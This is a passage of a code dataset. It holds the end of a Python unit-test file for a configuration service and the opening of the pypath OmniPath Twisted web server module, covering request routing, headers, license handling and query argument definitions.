\"store_dir\": \"/data/store\",\n \"notifier\": {\n \"alerts\": [{\n \"type\": \"preserve.failure\",\n \"targets\": [ \"oarop\" ]\n }, {\n \"type\": 
\"preserve.success\",\n \"targets\": [ \"dev\" ]\n }]\n },\n \"sip_type\": {\n \"midas\": {\n \"common\": {\n \"review_dir\": \"/data/review\",\n \"upload_dir\": \"/data/upload\"\n }\n }\n }\n }\n self.assertEqual(config.ConfigService._inflate(d), out)\n\n def test_deep_update(self):\n d = {\n \"a\": {\n \"a.b\": 1,\n \"a.c\": 2,\n \"a.d\": {\n \"ad.a\": 4,\n \"ad.b\": 5\n }\n }\n }\n u = {\n \"a\": {\n \"a.c\": 20,\n \"a.d\": {\n \"ad.b\": 50,\n \"ad.c\": 60\n }\n }\n }\n out = {\n \"a\": {\n \"a.b\": 1,\n \"a.c\": 20,\n \"a.d\": {\n \"ad.a\": 4,\n \"ad.b\": 50,\n \"ad.c\": 60\n }\n }\n }\n n = config.ConfigService._deep_update(d, u)\n self.assertEqual(n, out)\n self.assertIs(n, d)\n\n def test_extract1(self):\n data = \\\n{\n \"propertySources\": [\n {\n \"source\": {\n \"RMMAPI\": \"https://goob/rmm/\",\n \"LANDING\": \"https://localhost/rmm/\", \n \"SDPAPI\": \"https://localhost/sdp/\", \n },\n \"name\": \"classpath:config/oar-uri/oar-uri.yml\"\n },\n {\n \"source\": {\n \"RMMAPI\": \"https://localhost/rmm/\", \n \"SDPAPI\": \"https://localhost/sdp/\", \n }, \n \"hail\": \"fire\"\n }\n ], \n \"version\": None, \n \"name\": \"oaruri\", \n \"profiles\": [\n \"local\"\n ], \n \"label\": None\n}\n out = {\n \"RMMAPI\": \"https://goob/rmm/\",\n \"SDPAPI\": \"https://localhost/sdp/\", \n \"LANDING\": \"https://localhost/rmm/\", \n }\n\n self.assertEqual(config.ConfigService.extract(data), out)\n\n def test_extract2(self):\n data = \\\n{\n \"propertySources\": [\n {\n \"source\": {\n \"store_dir\": \"/var/data/store\",\n 'sip_type.midas.common.review_dir': \"/var/data/review\",\n 'notifier.alerts[1].type': \"preserve.win\",\n 'notifier.alerts[1].targets[3]': \"oarop\",\n },\n \"name\": \"classpath:config/oar-uri/oar-uri.yml\"\n },\n {\n \"source\": {\n \"working_dir\": \"/data/pdr\",\n \"store_dir\": \"/data/store\",\n 'notifier.alerts[1].type': \"preserve.success\",\n 'notifier.alerts[1].targets[0]': \"dev\",\n 'notifier.alerts[0].type': \"preserve.failure\",\n 'notifier.alerts[0].targets[0]': \"oarop\",\n 'sip_type.midas.common.review_dir': \"/data/review\",\n 'sip_type.midas.common.upload_dir': \"/data/upload\",\n }, \n \"name\": \"classpath:config/oar-uri/oar-uri-dev.yml\"\n }\n ], \n \"version\": None, \n \"name\": \"oaruri\", \n \"profiles\": [\n \"local\"\n ], \n \"label\": None\n}\n\n out = {\n \"working_dir\": \"/data/pdr\",\n \"store_dir\": \"/var/data/store\",\n \"notifier\": {\n \"alerts\": [{\n \"type\": \"preserve.failure\",\n \"targets\": [ \"oarop\" ]\n }, {\n \"type\": \"preserve.win\",\n \"targets\": [ \"dev\", \"oarop\" ]\n }]\n },\n \"sip_type\": {\n \"midas\": {\n \"common\": {\n \"review_dir\": \"/var/data/review\",\n \"upload_dir\": \"/data/upload\"\n }\n }\n }\n }\n self.assertEqual(config.ConfigService.extract(data), out)\n\n def test_extract3(self):\n data = \\\n{\n \"propertySources\": [\n {\n \"source\": {\n \"store_dir\": \"/var/data/store\",\n 'sip_type.midas.common.review_dir': \"/var/data/review\",\n 'notifier.alerts[1].type': \"preserve.win\",\n 'notifier.alerts[1].targets[3]': \"oarop\",\n },\n \"name\": \"classpath:config/oar-uri/oar-uri.yml\"\n },\n {\n \"source\": {\n \"working_dir\": \"/data/pdr\",\n \"store_dir\": \"/data/store\",\n 'notifier.alerts[1].type': \"preserve.success\",\n 'notifier.alerts[1].targets[0]': \"dev\",\n 'notifier.alerts[0].type': \"preserve.failure\",\n 'notifier.alerts[0].targets[0]': \"oarop\",\n 'sip_type.midas.common.review_dir': \"/data/review\",\n 'sip_type.midas.common.upload_dir': \"/data/upload\",\n }, \n \"name\": 
\"classpath:config/oar-uri/oar-uri-dev.yml\"\n }\n ], \n \"version\": None, \n \"name\": \"oaruri\", \n \"profiles\": [\n \"local\"\n ], \n \"label\": None\n}\n\n out = { \"working_dir\": \"/data/pdr\",\n \"store_dir\": \"/var/data/store\",\n 'notifier.alerts[1].type': \"preserve.win\",\n 'notifier.alerts[1].targets[0]': \"dev\",\n 'notifier.alerts[1].targets[3]': \"oarop\",\n 'notifier.alerts[0].type': \"preserve.failure\",\n 'notifier.alerts[0].targets[0]': \"oarop\",\n 'sip_type.midas.common.review_dir': \"/var/data/review\",\n 'sip_type.midas.common.upload_dir': \"/data/upload\" }\n\n self.assertEqual(config.ConfigService.extract(data, flat=True), out)\n \n\n @test.skipIf(\"noreload\" in os.environ.get(\"OAR_TEST_INCLUDE\", \"\"),\n \"Avoid reloading modules when part of larger TestSuite\")\n def test_defservice(self):\n self.assertNotIn('OAR_CONFIG_SERVICE', os.environ)\n self.assertIsNone(config.service)\n try:\n os.environ['OAR_CONFIG_SERVICE'] = \"https://config.org/oar/\"\n importlib.reload(config)\n self.assertIsNotNone(config.service)\n self.assertEqual(config.service._base, \"https://config.org/oar/\")\n self.assertIsNone(config.service._prof)\n finally:\n if 'OAR_CONFIG_SERVICE' in os.environ:\n del os.environ['OAR_CONFIG_SERVICE']\n \n def test_defservice(self):\n self.assertNotIn('OAR_CONFIG_SERVICE', os.environ)\n self.assertIsNone(config.service)\n try:\n os.environ['OAR_CONFIG_SERVICE'] = \"https://config.org/oar/\"\n config.service = config.ConfigService.from_env()\n self.assertIsNotNone(config.service)\n self.assertEqual(config.service._base, \"https://config.org/oar/\")\n self.assertIsNone(config.service._prof)\n finally:\n if 'OAR_CONFIG_SERVICE' in os.environ:\n del os.environ['OAR_CONFIG_SERVICE']\n config.service = None\n \n\n\nif __name__ == '__main__':\n test.main()\n","repo_name":"usnistgov/oar-pdr-py","sub_path":"python/tests/nistoar/pdr/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":14391,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"70278618989","text":"from future.utils import iteritems\n\nimport sys\nimport os\nimport re\nimport copy\nimport collections\nimport itertools\nimport hashlib\nimport warnings\nimport contextlib\n\nfrom pypath.share import session as session_mod\n\n_logger = session_mod.Logger(name = 'server')\n_log = _logger._log\n\ntry:\n import twisted.web.resource\n import twisted.web.server\n import twisted.internet.reactor\n TwistedWebResource = twisted.web.resource.Resource\n TwistedWebSite = twisted.web.server.Site\n TWISTED_NOT_DONE_YET = twisted.web.server.NOT_DONE_YET\n twisted_listen_tcp = twisted.internet.reactor.listenTCP\n twisted_run = twisted.internet.reactor.run\nexcept:\n _log('No module `twisted` available. 
Necessary to run HTTP server.', -1)\n    class TwistedWebResource: pass\n    class TwistedWebSite: pass\n    TWISTED_NOT_DONE_YET = None\n    twisted_listen_tcp = lambda: None\n    twisted_run = lambda: None\n\nimport urllib\nimport json\nimport mimetypes\n\nimport pandas as pd\nimport numpy as np\n\nimport pypath.resources as resources\nfrom pypath.omnipath.server import generate_about_page\nimport pypath.omnipath.server._html as _html\nimport pypath.resources.urls as urls\nimport pypath.resources as resources_mod\nimport pypath.share.common as common\nimport pypath.share.constants as constants\nimport pypath.core.intercell_annot as intercell_annot\nimport pypath.share.settings as settings\nfrom pypath.share.common import flat_list\nfrom pypath._metadata import __version__\n\nif 'unicode' not in __builtins__:\n    unicode = str\n\n\nLICENSE_IGNORE = 'ignore'\n\n\ndef stop_server():\n\n    reactor.removeAll()\n\n\n@contextlib.contextmanager\ndef ignore_pandas_copywarn():\n\n    try:\n\n        with warnings.catch_warnings():\n\n            warnings.simplefilter('ignore', pd.errors.SettingWithCopyWarning)\n\n            yield\n\n    finally:\n\n        pass\n\n\nclass BaseServer(TwistedWebResource, session_mod.Logger):\n\n\n    # the original pattern literal was lost in this copy (stripped as if it were\n    # an HTML comment); reconstructed here to capture a page title from a\n    # comment such as <!-- title -->\n    recomment = re.compile(b'<!--\\\\s*(.*?)\\\\s*-->')\n\n\n    def __init__(self):\n\n        if not hasattr(self, '_log_name'):\n\n            session_mod.Logger.__init__(self, name = 'server')\n\n        self._log('Initializing BaseServer.')\n\n        self.htmls = ['info', 'error_page.html']\n        self.welcome_message = (\n            'Hello, this is the REST service of pypath %s. Welcome!\\n'\n            'For the descriptions of pathway resources go to `/info`.\\n'\n            'Available query types: interactions, enz_sub, complexes, \\n'\n            'annotations, intercell'\n        ) % __version__\n\n        self.isLeaf = True\n        self._set_www_root()\n        self._read_license_secret()\n        self._res_ctrl = resources_mod.get_controller()\n\n        TwistedWebResource.__init__(self)\n        self._log('Twisted resource initialized.')\n\n\n    def render_GET(self, request):\n\n        response = []\n\n        request.postpath = [i.decode('utf-8') for i in request.postpath if i]\n\n        self._log(\n            'Processing request: `%s` from `%s`; headers: [%s].' % (\n                request.uri.decode('utf-8'),\n                str(request.getClientAddress()),\n                common.dict_str(request.getAllHeaders()),\n            )\n        )\n\n        if not request.postpath:\n\n            request.postpath = ['index.html']\n\n        request.postpath[0] = self._query_type(request.postpath[0])\n\n        self._set_headers(request)\n\n        if (\n            request.postpath and\n            (\n                hasattr(self, request.postpath[0]) or\n                request.postpath[0] == 'error_page.html'\n            ) and\n            request.postpath[0][0] != '_'\n        ):\n\n            if request.postpath[0] == 'error_page.html':\n\n                toCall = self._error_page\n\n            else:\n\n                self._process_postpath(request)\n                toCall = getattr(self, request.postpath[0])\n\n            if hasattr(toCall, '__call__'):\n\n                self._log(\n                    'Query type: `%s`; Arguments: [%s].' 
% (\n request.postpath[0],\n common.dict_str(request.args),\n )\n )\n\n try:\n\n response = toCall(request)\n response = (\n response.encode('utf-8')\n if hasattr(response, 'encode') else\n response\n )\n response = [response]\n\n except:\n\n self._log(\n 'Error while rendering `%s`:' %\n request.uri.decode('utf-8')\n )\n self._log_traceback()\n raise\n\n else:\n\n local_path = self._local_path(request)\n\n if local_path:\n\n with open(local_path, 'rb') as fp:\n\n response = [fp.read()]\n\n response = self._add_html_header(local_path, response)\n\n if not response:\n\n response = [\n (\n \"Not found: %s%s\" % (\n '/'.join(request.postpath),\n ''\n if len(request.args) == 0 else\n '?%s' %\n '&'.join([\n '%s=%s' % (\n k.decode('utf-8'),\n v[0].decode('utf-8')\n )\n for k, v in iteritems(request.args)\n if v\n ])\n )\n ).encode('utf-8')\n ]\n\n request.setHeader('Content-Length', str(len(response[0])))\n request.write(response[0])\n\n self._log(\n 'Finished serving request: `%s`.' % request.uri.decode('utf-8')\n )\n\n request.finish()\n\n return TWISTED_NOT_DONE_YET\n\n\n def render_POST(self, request):\n\n if (\n request.getHeader(b'content-type') and\n request.getHeader(b'content-type').startswith(b'application/json')\n ):\n\n post_content = request.content.getvalue()\n\n if post_content and post_content.strip():\n\n args_raw = json.loads(post_content)\n request.args = dict(\n (\n k.encode('utf-8'),\n [v.encode('utf-8')]\n if type(v) is not list else\n [','.join(v).encode('utf-8')]\n )\n for k, v in iteritems(args_raw)\n )\n\n return self.render_GET(request)\n\n\n def _set_www_root(self):\n\n self.wwwbuiltin = os.path.join(common.ROOT, 'data', 'www')\n self.wwwroot = settings.get('www_root')\n\n if not os.path.exists(self.wwwroot):\n\n self.wwwroot = self.wwwbuiltin\n\n\n def _local_path(self, request):\n\n if request.postpath and request.postpath[-1].startswith('_'):\n\n return\n\n for wwwroot in (self.wwwroot, self.wwwbuiltin):\n\n path = os.path.join(wwwroot, *request.postpath)\n\n if os.path.exists(path):\n\n return path\n\n\n def _set_headers(self, request):\n\n for k, v in iteritems(request.args):\n\n request.args[k] = [b','.join(v)]\n\n request.setHeader('Cache-Control', 'Public')\n request.setHeader('Access-Control-Allow-Origin', '*')\n\n if '' in request.postpath:\n\n request.postpath.remove('')\n\n if not request.postpath:\n\n request.postpath = ['index.html']\n\n if request.postpath and request.postpath[0] == 'resources':\n\n request.args[b'format'] = [b'json']\n\n local_path = self._local_path(request)\n\n if local_path:\n\n format_ = mimetypes.guess_type(local_path)[0]\n format_ = (\n tuple(format_.split('/'))\n if format_ else\n ('text', 'plain')\n )\n\n elif (\n not request.postpath or\n request.postpath[0] in self.htmls or\n request.postpath[0] == 'error_page.html'\n ):\n\n format_ = ('text', 'html')\n\n elif (\n b'format' in request.args and\n request.args[b'format'][0] == b'json'\n ):\n\n format_ = ('application', 'json')\n\n elif request.postpath[0] == 'favicon.ico':\n\n format_ = ('image', 'vnd.microsoft.icon')\n\n else:\n\n request.args[b'format'] = [b'text']\n format_ = ('text', 'plain')\n\n request.setHeader(\n 'Content-Type',\n '%s/%s%s' % (\n format_ + (\n '; charset=utf-8' if format_[0] == 'text' else '',\n )\n )\n )\n\n request.args[b'header'] = (\n [b'1']\n if b'header' not in request.args else\n request.args[b'header']\n )\n\n self._set_fields(request)\n self._set_license(request)\n\n\n def _set_fields(self, req):\n\n synonyms = (\n self.field_synonyms\n if 
hasattr(self, 'field_synonyms') else\n {}\n )\n\n if b'fields' in req.args:\n\n used = set()\n\n fields_checked = []\n\n for field in req.args[b'fields'][0].decode('utf-8').split(','):\n\n field = synonyms[field] if field in synonyms else field\n\n if field not in used:\n\n fields_checked.append(field)\n used.add(field)\n\n req.args[b'fields'] = [','.join(fields_checked).encode('utf-8')]\n\n else:\n\n req.args[b'fields'] = []\n\n\n def _set_license(self, req):\n\n query_type = req.postpath[0] if req.postpath else None\n query_type = self._query_type(query_type)\n\n if (\n not hasattr(self, 'args_reference') or\n not query_type or\n query_type not in self.args_reference or\n 'license' not in self.args_reference[query_type]\n ):\n\n return\n\n auth = False\n\n if b'password' in req.args:\n\n req_secret = hashlib.md5(req.args[b'password'][0]).hexdigest()\n\n auth = (\n self._license_secret is not None and\n self._license_secret == req_secret\n )\n\n # if someone sent a valid password,\n # we can ignore the license levels\n if auth:\n\n req.args[b'license'] = [b'ignore']\n\n # if the license level is not set,\n # or is set to `ignore` without successful authentication,\n # we fall back to the default license level\n if (\n b'license' not in req.args or (\n not auth and\n req.args[b'license'][0] == b'ignore'\n )\n ):\n\n req.args[b'license'] = self._default_license\n\n\n def _process_postpath(self, req):\n\n if len(req.postpath) > 1:\n\n ids_left = [req.postpath[1].encode('utf-8')]\n\n ids_right = (\n [req.postpath[2].encode('utf-8')]\n if (\n len(req.postpath) > 2 and\n req.postpath[2].lower() not in {'and', 'or'}\n ) else\n None\n )\n\n left_right = (\n [b'OR']\n if req.postpath[-1].lower() not in {'and', 'or'} else\n [req.postpath[-1].encode('utf-8')]\n )\n\n if ids_right:\n\n if req.postpath[0] == 'enzsub':\n\n req.args[b'enzymes'] = ids_left\n req.args[b'substrates'] = ids_right\n\n else:\n req.args[b'sources'] = ids_left\n req.args[b'targets'] = ids_right\n\n else:\n req.args[b'partners'] = ids_left\n\n if req.postpath[0] == 'enzsub':\n req.args[b'enzyme_substrate'] = left_right\n else:\n req.args[b'source_target'] = left_right\n\n\n def _query_type(self, query_type):\n\n return (\n self.query_type_synonyms[query_type]\n if (\n hasattr(self, 'query_type_synonyms') and\n query_type in self.query_type_synonyms\n ) else\n query_type\n )\n\n\n def _add_html_header(self, local_path, response):\n\n if (\n local_path.endswith('html') or\n local_path.endswith('htm')\n ) and not response[0].startswith(b'<!DOCTYPE'):\n\n # NB: the HTML literals below are a reconstruction; the original\n # markup was stripped from this copy of the file\n head_foot = [\n (\n b'<!DOCTYPE html>\\n<html>\\n<head>\\n'\n b'<title>%s</title>\\n</head>\\n<body>\\n'\n ),\n b'</body>\\n</html>\\n',\n ]\n\n for wwwroot in (self.wwwroot, self.wwwbuiltin):\n\n for i, part in enumerate(('header', 'footer')):\n\n path = os.path.join(wwwroot, '_%s.html' % part)\n\n if os.path.exists(path):\n\n with open(path, 'rb') as fp:\n\n head_foot[i] = fp.read()\n\n if b'%s' in head_foot[0]:\n\n title = self.recomment.search(response[0])\n title = title.groups()[0] if title else b'pypath server'\n head_foot[0] = head_foot[0] % title.strip()\n\n response[0] = head_foot[0] + response[0] + head_foot[1]\n\n return response\n\n\n def about(self, req):\n\n return self.welcome_message\n\n\n def info(self, req):\n\n if (\n b'format' in req.args and\n req.args[b'format'][0] == b'json' and\n hasattr(self, 'resources')\n ):\n\n return self.resources(req)\n\n rc = resources.get_controller()\n rc.update()\n\n return generate_about_page.generate_about_html(rc.data)\n\n\n def _root(self, req):\n\n return _html.main_page()\n\n\n def _parse_arg(self, arg):\n\n if 
isinstance(arg, list) and arg:\n arg = arg[0]\n if hasattr(arg, 'decode'):\n arg = arg.decode('utf-8')\n if hasattr(arg, 'lower'):\n arg = arg.lower()\n if hasattr(arg, 'isdigit') and arg.isdigit():\n arg = int(arg)\n if arg in constants.BOOLEAN_FALSE:\n arg = False\n if arg in constants.BOOLEAN_TRUE:\n arg = True\n\n return bool(arg)\n\n\n def _read_license_secret(self):\n\n self._license_secret = None\n\n path = settings.get('license_secret')\n\n if os.path.exists(path):\n\n self._log('Reading license unlocking secret from `%s`.' % path)\n\n with open(path, 'r') as fp:\n\n self._license_secret = fp.read().strip()\n\n self._default_license = [\n settings.get('server_default_license').encode('ascii')\n ]\n\n\n def _error_page(self, req):\n\n req.setResponseCode(500)\n\n return _html.http_500()\n\n\nclass TableServer(BaseServer):\n\n query_types = {\n 'annotations',\n 'intercell',\n 'interactions',\n 'enz_sub',\n 'enzsub',\n 'ptms',\n 'complexes',\n 'about',\n 'info',\n 'queries',\n 'annotations_summary',\n 'intercell_summary',\n }\n data_query_types = {\n 'annotations',\n 'intercell',\n 'interactions',\n 'enzsub',\n 'complexes',\n }\n list_fields = {\n 'sources',\n 'references',\n 'isoforms',\n }\n\n int_list_fields = {\n 'references',\n 'isoforms',\n }\n\n field_synonyms = {\n 'organism': 'ncbi_tax_id',\n 'tfregulons_level': 'dorothea_level',\n 'tfregulons_curated': 'dorothea_curated',\n 'tfregulons_chipseq': 'dorothea_chipseq',\n 'tfregulons_tfbs': 'dorothea_tfbs',\n 'tfregulons_coexp': 'dorothea_coexp',\n 'sources': 'resources',\n 'databases': 'resources',\n }\n\n args_reference = {\n 'interactions': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table'\n },\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'password': None,\n 'limit': None,\n 'datasets': {\n 'omnipath',\n 'tfregulons',\n 'dorothea',\n 'collectri',\n 'tf_target',\n 'tf_mirna',\n 'lncrna_mrna',\n 'kinaseextra',\n 'ligrecextra',\n 'pathwayextra',\n 'mirnatarget',\n 'small_molecule',\n },\n 'types': {\n 'post_translational',\n 'transcriptional',\n 'post_transcriptional',\n 'mirna_transcriptional',\n 'lncrna_post_transcriptional',\n 'small_molecule_protein',\n },\n 'sources': None,\n 'resources': None,\n 'databases': None,\n 'targets': None,\n 'partners': None,\n 'genesymbols': constants.BOOLEAN_VALUES,\n 'evidences': None,\n 'extra_attrs': None,\n 'fields': {\n 'entity_type',\n 'references',\n 'sources',\n 'tfregulons_level',\n 'tfregulons_curated',\n 'tfregulons_chipseq',\n 'tfregulons_tfbs',\n 'tfregulons_coexp',\n 'dorothea_level',\n 'dorothea_curated',\n 'dorothea_chipseq',\n 'dorothea_tfbs',\n 'dorothea_coexp',\n 'type',\n 'ncbi_tax_id',\n 'databases',\n 'resources',\n 'organism',\n 'curation_effort',\n 'datasets',\n 'extra_attrs',\n 'evidences',\n },\n 'tfregulons_levels': {'A', 'B', 'C', 'D', 'E'},\n 'tfregulons_methods': {\n 'curated',\n 'chipseq',\n 'coexp',\n 'tfbs',\n },\n 'dorothea_levels': {'A', 'B', 'C', 'D', 'E'},\n 'dorothea_methods': {\n 'curated',\n 'chipseq',\n 'coexp',\n 'tfbs',\n },\n 'organisms': {\n '9606',\n '10090',\n '10116',\n },\n 'source_target': {\n 'AND',\n 'OR',\n 'and',\n 'or',\n },\n 'directed': constants.BOOLEAN_VALUES,\n 'signed': constants.BOOLEAN_VALUES,\n 'loops': constants.BOOLEAN_VALUES,\n 'entity_types': {\n 'protein',\n 'complex',\n 'mirna',\n 'lncrna',\n 'small_molecule',\n 'drug',\n 'metabolite',\n 'lipid',\n },\n },\n 'enzsub': {\n 'header': None,\n 'format': {\n 'json',\n 
'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'password': None,\n 'limit': None,\n 'enzymes': None,\n 'substrates': None,\n 'partners': None,\n 'genesymbols': constants.BOOLEAN_VALUES,\n 'organisms': {\n '9606',\n '10090',\n '10116',\n },\n 'databases': None,\n 'resources': None,\n 'residues': None,\n 'modification': None,\n 'types': None,\n 'fields': {\n 'sources',\n 'references',\n 'ncbi_tax_id',\n 'organism',\n 'databases',\n 'resources',\n 'isoforms',\n 'curation_effort',\n },\n 'enzyme_substrate': {\n 'AND',\n 'OR',\n 'and',\n 'or',\n }\n },\n 'annotations': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'password': None,\n 'limit': None,\n 'databases': None,\n 'resources': None,\n 'proteins': None,\n 'fields': None,\n 'genesymbols': constants.BOOLEAN_VALUES,\n 'entity_types': {\n 'protein',\n 'complex',\n 'mirna',\n 'lncrna',\n 'small_molecule',\n 'drug',\n 'metabolite',\n 'lipid',\n },\n },\n 'annotations_summary': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'databases': None,\n 'resources': None,\n 'fields': None,\n 'cytoscape': constants.BOOLEAN_VALUES,\n },\n 'intercell': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'password': None,\n 'limit': None,\n 'scope': {\n 'specific',\n 'generic',\n },\n 'aspect': {\n 'functional',\n 'locational',\n },\n 'source': {\n 'resource_specific',\n 'composite',\n },\n 'categories': None,\n 'databases': None,\n 'resources': None,\n 'parent': None,\n 'proteins': None,\n 'fields': None,\n 'entity_types': {\n 'protein',\n 'complex',\n 'mirna',\n 'lncrna',\n 'small_molecule',\n 'drug',\n 'metabolite',\n 'lipid',\n },\n 'transmitter': constants.BOOLEAN_VALUES,\n 'receiver': constants.BOOLEAN_VALUES,\n 'trans': constants.BOOLEAN_VALUES,\n 'rec': constants.BOOLEAN_VALUES,\n 'secreted': constants.BOOLEAN_VALUES,\n 'plasma_membrane_peripheral': constants.BOOLEAN_VALUES,\n 'plasma_membrane_transmembrane': constants.BOOLEAN_VALUES,\n 'sec': constants.BOOLEAN_VALUES,\n 'pmp': constants.BOOLEAN_VALUES,\n 'pmtm': constants.BOOLEAN_VALUES,\n 'causality': {\n 'transmitter',\n 'trans',\n 'receiver',\n 'rec',\n 'both'\n },\n 'topology': {\n 'secreted',\n 'sec',\n 'plasma_membrane_peripheral',\n 'pmp',\n 'plasma_membrane_transmembrane',\n 'pmtm',\n },\n },\n 'intercell_summary': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'scope': {\n 'specific',\n 'generic',\n },\n 'aspect': {\n 'functional',\n 'locational',\n },\n 'source': {\n 'resource_specific',\n 'generic',\n },\n 'categories': None,\n 'resources': None,\n 'databases': None,\n 'parent': None,\n 'fields': None,\n 'transmitter': constants.BOOLEAN_VALUES,\n 'receiver': constants.BOOLEAN_VALUES,\n 'trans': constants.BOOLEAN_VALUES,\n 'rec': constants.BOOLEAN_VALUES,\n 'secreted': constants.BOOLEAN_VALUES,\n 'plasma_membrane_peripheral': constants.BOOLEAN_VALUES,\n 'plasma_membrane_transmembrane': constants.BOOLEAN_VALUES,\n 'sec': constants.BOOLEAN_VALUES,\n 'pmp': constants.BOOLEAN_VALUES,\n 'pmtm': constants.BOOLEAN_VALUES,\n },\n 'complexes': {\n 'header': None,\n 
'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'password': None,\n 'limit': None,\n 'databases': None,\n 'resources': None,\n 'proteins': None,\n 'fields': None,\n },\n 'resources': {\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'format': {\n 'json',\n },\n 'datasets': {\n 'interactions',\n 'interaction',\n 'network',\n 'enzsub',\n 'enz_sub',\n 'enzyme-substrate',\n 'annotations',\n 'annotation',\n 'annot',\n 'intercell',\n 'complex',\n 'complexes',\n },\n 'subtypes': None,\n },\n 'queries': {\n 'format': {\n 'tab',\n 'text',\n 'tsv',\n 'table',\n 'json',\n },\n },\n }\n\n\n query_type_synonyms = {\n 'interactions': 'interactions',\n 'interaction': 'interactions',\n 'network': 'interactions',\n 'enz_sub': 'enzsub',\n 'enz-sub': 'enzsub',\n 'ptms': 'enzsub',\n 'ptm': 'enzsub',\n 'enzyme-substrate': 'enzsub',\n 'enzyme_substrate': 'enzsub',\n 'annotations': 'annotations',\n 'annotation': 'annotations',\n 'annot': 'annotations',\n 'intercell': 'intercell',\n 'intercellular': 'intercell',\n 'inter_cell': 'intercell',\n 'inter-cell': 'intercell',\n 'complex': 'complexes',\n 'complexes': 'complexes',\n }\n datasets_ = {\n 'omnipath',\n 'tfregulons',\n 'dorothea',\n 'collectri',\n 'tf_target',\n 'kinaseextra',\n 'ligrecextra',\n 'pathwayextra',\n 'mirnatarget',\n 'tf_mirna',\n 'lncrna_mrna',\n 'small_molecule',\n }\n dorothea_methods = {'curated', 'coexp', 'chipseq', 'tfbs'}\n dataset2type = {\n 'omnipath': 'post_translational',\n 'tfregulons': 'transcriptional',\n 'dorothea': 'transcriptional',\n 'collectri': 'transcriptional',\n 'tf_target': 'transcriptional',\n 'kinaseextra': 'post_translational',\n 'ligrecextra': 'post_translational',\n 'pathwayextra': 'post_translational',\n 'mirnatarget': 'post_transcriptional',\n 'tf_mirna': 'mirna_transcriptional',\n 'lncrna_mrna': 'lncrna_post_transcriptional',\n 'small_molecule': 'small_molecule_protein',\n }\n interaction_fields = {\n 'references', 'sources', 'dorothea_level',\n 'dorothea_curated', 'dorothea_chipseq',\n 'dorothea_tfbs', 'dorothea_coexp',\n 'tfregulons_level', 'tfregulons_curated',\n 'tfregulons_chipseq', 'tfregulons_tfbs', 'tfregulons_coexp',\n 'type', 'ncbi_tax_id', 'databases', 'organism',\n 'curation_effort', 'resources', 'entity_type',\n 'datasets', 'extra_attrs', 'evidences',\n }\n enzsub_fields = {\n 'references', 'sources', 'databases',\n 'isoforms', 'organism', 'ncbi_tax_id',\n 'curation_effort', 'resources',\n }\n default_input_files = {\n 'interactions': 'omnipath_webservice_interactions.tsv',\n 'enzsub': 'omnipath_webservice_enz_sub.tsv',\n 'annotations': 'omnipath_webservice_annotations.tsv',\n 'complexes': 'omnipath_webservice_complexes.tsv',\n 'intercell': 'omnipath_webservice_intercell.tsv',\n }\n default_dtypes = collections.defaultdict(\n dict,\n interactions = {\n 'source': 'category',\n 'target': 'category',\n 'source_genesymbol': 'category',\n 'target_genesymbol': 'category',\n 'is_directed': 'int8',\n 'is_stimulation': 'int8',\n 'is_inhibition': 'int8',\n 'consensus_direction': 'int8',\n 'consensus_stimulation': 'int8',\n 'consensus_inhibition': 'int8',\n 'sources': 'category',\n 'references': 'category',\n 'dorothea_curated': 'category',\n 'dorothea_chipseq': 'category',\n 'dorothea_tfbs': 'category',\n 'dorothea_coexp': 'category',\n 'dorothea_level': 'category',\n 'type': 'category',\n 
'ncbi_tax_id_source': 'int16',\n 'ncbi_tax_id_target': 'int16',\n 'entity_type_source': 'category',\n 'entity_type_target': 'category',\n 'curation_effort': 'int16',\n 'extra_attrs': 'category',\n 'evidences': 'category',\n },\n annotations = {\n 'uniprot': 'category',\n 'genesymbol': 'category',\n 'entity_type': 'category',\n 'source': 'category',\n 'label': 'category',\n 'value': 'category',\n 'record_id': 'uint32',\n },\n enzsub = {\n 'enzyme': 'category',\n 'substrate': 'category',\n 'enzyme_genesymbol': 'category',\n 'substrate_genesymbol': 'category',\n 'isoforms': 'category',\n 'residue_type': 'category',\n 'residue_offset': 'uint16',\n 'modification': 'category',\n 'sources': 'category',\n 'references': 'category',\n 'ncbi_tax_id': 'int16',\n 'curation_effort': 'int32',\n },\n complexes = {\n 'name': 'category',\n 'stoichiometry': 'category',\n 'sources': 'category',\n 'references': 'category',\n 'identifiers': 'category',\n },\n intercell = {\n 'category': 'category',\n 'database': 'category',\n 'uniprot': 'category',\n 'genesymbol': 'category',\n 'parent': 'category',\n 'aspect': 'category',\n 'scope': 'category',\n 'source': 'category',\n 'entity_type': 'category',\n 'consensus_score': 'uint16',\n 'transmitter': 'bool',\n 'receiver': 'bool',\n 'secreted': 'bool',\n 'plasma_membrane_transmembrane': 'bool',\n 'plasma_membrane_peripheral': 'bool',\n }\n )\n\n # the annotation attributes served for the cytoscape app\n cytoscape_attributes = {\n ('Zhong2015', 'type'),\n ('MatrixDB', 'mainclass'),\n ('Matrisome', ('mainclass', 'subclass', 'subsubclass')),\n # ('TFcensus', 'in 